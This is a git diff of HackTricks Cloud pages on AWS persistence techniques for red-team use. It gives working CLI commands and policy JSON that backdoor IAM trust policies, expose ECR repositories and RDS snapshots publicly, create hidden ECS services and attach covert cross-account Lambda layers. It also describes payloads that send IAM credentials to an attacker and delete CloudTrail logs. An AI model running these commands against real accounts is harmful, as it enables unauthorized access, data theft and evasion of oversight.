@@ -0,0 +1,54 @@ +# AWS - EC2 Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## EC2 + +For more information check: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} + +### Security Group Connection Tracking Persistence + +If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. + +If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** + +### EC2 Lifecycle Manager + +This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ +An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. + +### Scheduled Instances + +It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. + +### Spot Fleet Request + +Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. 
+ +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +- Using a traditional **rootkit** for example +- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) +- Backdooring the **User Data** + +### **Backdoor Launch Configuration** + +- Backdoor the used AMI +- Backdoor the User Data +- Backdoor the Key Pair + +### VPN + +Create a VPN so the attacker will be able to connect directly through i to the VPC. + +### VPC Peering + +Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md new file mode 100644 index 000000000..2efeb83cb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md 
@@ -0,0 +1,97 @@ +# AWS - ECR Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## ECR + +For more information check: + +{{#ref}} +../aws-services/aws-ecr-enum.md +{{#endref}} + +### Hidden Docker Image with Malicious Code + +An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. + +### Repository Policy + +Add a policy to a single repository granting yourself (or everybody) access to a repository: + +```bash +aws ecr set-repository-policy \ + --repository-name cluster-autoscaler \ + --policy-text file:///tmp/my-policy.json + +# With a .json such as + +{ + "Version" : "2008-10-17", + "Statement" : [ + { + "Sid" : "allow public pull", + "Effect" : "Allow", + "Principal" : "*", + "Action" : [ + "ecr:BatchCheckLayerAvailability", + "ecr:BatchGetImage", + "ecr:GetDownloadUrlForLayer" + ] + } + ] +} +``` + +> [!WARNING] +> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. + +### Registry Policy & Cross-account Replication + +It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. + +
+ +First, you need to give the external account access over the registry with a **registry policy** like: + +```bash +aws ecr put-registry-policy --policy-text file://my-policy.json + +# With a .json like: + +{ + "Sid": "asdasd", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::947247140022:root" + }, + "Action": [ + "ecr:CreateRepository", + "ecr:ReplicateImage" + ], + "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" +} +``` + +Then apply the replication config: + +```bash +aws ecr put-replication-configuration \ + --replication-configuration file://replication-settings.json \ + --region us-west-2 + +# Having the .json a content such as: +{ + "rules": [{ + "destinations": [{ + "region": "destination_region", + "registryId": "destination_accountId" + }], + "repositoryFilters": [{ + "filter": "repository_prefix_name", + "filterType": "PREFIX_MATCH" + }] + }] +} +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md similarity index 50% rename from pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md index 0b79be73e..da975a970 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md @@ -1,33 +1,19 @@ # AWS - ECS Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## ECS For more information check: -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ecs-enum.md +{{#endref}} ### Hidden Periodic ECS Task -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. @@ -62,9 +48,8 @@ aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ ### Backdoor Container in Existing ECS Task Definition -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities. @@ -90,9 +75,8 @@ aws ecs register-task-definition --family "existing-task" --container-definition ### Undocumented ECS Service -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service. 
@@ -112,17 +96,4 @@ aws ecs register-task-definition --family "malicious-task" --container-definitio aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md new file mode 100644 index 000000000..99916b572 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md @@ -0,0 +1,21 @@ +# AWS - EFS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## EFS + +For more information check: + +{{#ref}} +../aws-services/aws-efs-enum.md +{{#endref}} + +### Modify Resource Policy / Security Groups + +Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. + +### Create Access Point + +You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md similarity index 51% rename from pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md index 068ef11c5..6ff600d5e 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md @@ -1,27 +1,14 @@ # AWS - Elastic Beanstalk Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk For more information check: -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-elastic-beanstalk-enum.md +{{#endref}} ### Persistence in Instance @@ -37,9 +24,8 @@ Instead of changing the code on the actual version, the attacker could deploy a ### Abusing Custom Resource Lifecycle Hooks -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**. @@ -88,17 +74,4 @@ echo 'Resources: aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml" ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md new file mode 100644 index 000000000..9cab10503 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md @@ -0,0 +1,49 @@ +# AWS - IAM Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## IAM + +For more information access: + +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} + +### Common IAM Persistence + +- Create a user +- Add a controlled user to a privileged group +- Create access keys (of the new user or of all users) +- Grant extra permissions to controlled users/groups (attached policies or inline policies) +- Disable MFA / Add you own MFA device +- Create a Role Chain Juggling situation (more on this below in STS persistence) + +### Backdoor Role Trust Policies + +You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": ["*", "arn:aws:iam::123213123123:root"] + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +### Backdoor Policy Version + +Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. + +### Backdoor / Create Identity Provider + +If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md new file mode 100644 index 000000000..5a9646176 --- /dev/null 
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md @@ -0,0 +1,39 @@ +# AWS - KMS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS + +For mor information check: + +{{#ref}} +../aws-services/aws-kms-enum.md +{{#endref}} + +### Grant acces via KMS policies + +An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. + +### Eternal Grant + +Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. + +Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. + +(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) + +```bash +# To generate grants, generate 10 like this one +aws kms create-grant \ + --key-id \ + --grantee-principal \ + --operations "CreateGrant" "Decrypt" + +# To monitor grants +aws kms list-grants --key-id +``` + +> [!NOTE] +> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md new file mode 100644 index 000000000..7eaa170fd --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md 
@@ -0,0 +1,64 @@ +# AWS - Lambda Persistence + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda + +For more information check: + +{{#ref}} +../../aws-services/aws-lambda-enum.md +{{#endref}} + +### Lambda Layer Persistence + +It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: + +{{#ref}} +aws-lambda-layers-persistence.md +{{#endref}} + +### Lambda Extension Persistence + +Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. + +{{#ref}} +aws-abusing-lambda-extensions.md +{{#endref}} + +### Via resource policies + +It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: + +
+ +### Versions, Aliases & Weights + +A Lambda can have **different versions** (with different code each version).\ +Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ +This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. + +
+ +### Version Backdoor + API Gateway + +1. Copy the original code of the Lambda +2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST + 1. Call the API gateway related to the lambda to execute the code +3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. + 1. This will hide the backdoored code in a previous version +4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` + 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). +5. Select the POST method created and in Actions select **`Deploy API`** +6. Now, when you **call the function via POST your Backdoor** will be invoked + +### Cron/Event actuator + +The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ +Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. + +- Every time a new user is created lambda generates a new user key and send it to the attacker. +- Every time a new role is created lambda gives assume role permissions to compromised users. +- Every time new cloudtrail logs are generated, delete/alter them + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md new file mode 100644 index 000000000..3f78cfd42 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md 
@@ -0,0 +1,42 @@ +# AWS - Abusing Lambda Extensions + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda Extensions + +Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. + +- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. +- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. + +For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). + +### External Extension for Persistence, Stealing Requests & modifying Requests + +This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) + +It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. 
**This means that an external extension has full read and write access to Rapid’s heap memory, by design.** + +Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. + +The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. + +

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

+ +The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. + +> [!WARNING] +> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. + +Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. + +

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

+ +The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. + +## References + +- [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) +- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md similarity index 65% rename from pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md index dd762e60e..4b5b8e335 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md @@ -1,19 +1,6 @@ # AWS - Lambda Layers Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Lambda Layers 
@@ -35,21 +22,19 @@ The load path that Python will use in lambda is the following: Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`** -{% hint style="danger" %} -If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. -{% endhint %} +> [!CAUTION] +> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. Therefore, the requisites are: -* **Check libraries** that are **loaded** by the victims code -* Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. +- **Check libraries** that are **loaded** by the victims code +- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. ### Preloaded libraries -{% hint style="warning" %} -When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ -In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. -{% endhint %} +> [!WARNING] +> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ +> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. 
With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda: @@ -79,8 +64,8 @@ For doing that, we are going to **create the directory csv** with the file **`__ Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\ This file must: -* Execute our payload -* Load the original csv library +- Execute our payload +- Load the original csv library We can do both with: @@ -112,9 +97,9 @@ You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor* The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated: -{% content-ref url="../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +{{#endref}} ### External Layers 
@@ -123,12 +108,11 @@ Also note that the **max number of layers a lambda can have is 5**. Therefore, in order to improve the versatility of this technique an attacker could: -* Backdoor an existing layer of the user (nothing is external) -* **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. - * The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) - * The victim **won't see external layers** used with **`aws lambda list-layers`** +- Backdoor an existing layer of the user (nothing is external) +- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. + - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) + - The victim **won't see external layers** used with **`aws lambda list-layers`** -{% code overflow="wrap" %} ```bash # Upload backdoor layer aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" 
@@ -142,19 +126,5 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen # Remove permissions aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md new file mode 100644 index 000000000..ca387e687 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md @@ -0,0 +1,33 @@ +# AWS - Lightsail Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Lightsail + +For more information check: + +{{#ref}} +../aws-services/aws-lightsail-enum.md +{{#endref}} + +### Download Instance SSH keys & DB passwords + +They won't be changed probably so just having them is a good option for persistence + +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +- Using a traditional **rootkit** for example +- Adding a new **public SSH key** +- Expose a port with port knocking with a backdoor + +### DNS persistence + +If domains are configured: + +- Create a subdomain pointing your IP so you will have a **subdomain takeover** +- Create **SPF** record allowing you to send **emails** from the domain +- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md new file mode 100644 index 000000000..83e574fbe --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md 
@@ -0,0 +1,31 @@
+# AWS - RDS Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## RDS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-relational-database-rds-enum.md
+{{#endref}}
+
+### Make instance publicly accessible: `rds:ModifyDBInstance`
+
+An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+
+```bash
+aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
+```
+
+### Create an admin user inside the DB
+
+An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
+
+### Make snapshot public
+
+```bash
+aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
new file mode 100644
index 000000000..6db5208b1
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -0,0 +1,25 @@
+# AWS - S3 Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## S3
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-s3-athena-and-glacier-enum.md
+{{#endref}}
+
+### KMS Client-Side Encryption
+
+When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+
+
+
+Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+
+### Using S3 ACLs
+
+Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
new file mode 100644
index 000000000..e38afcdea
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
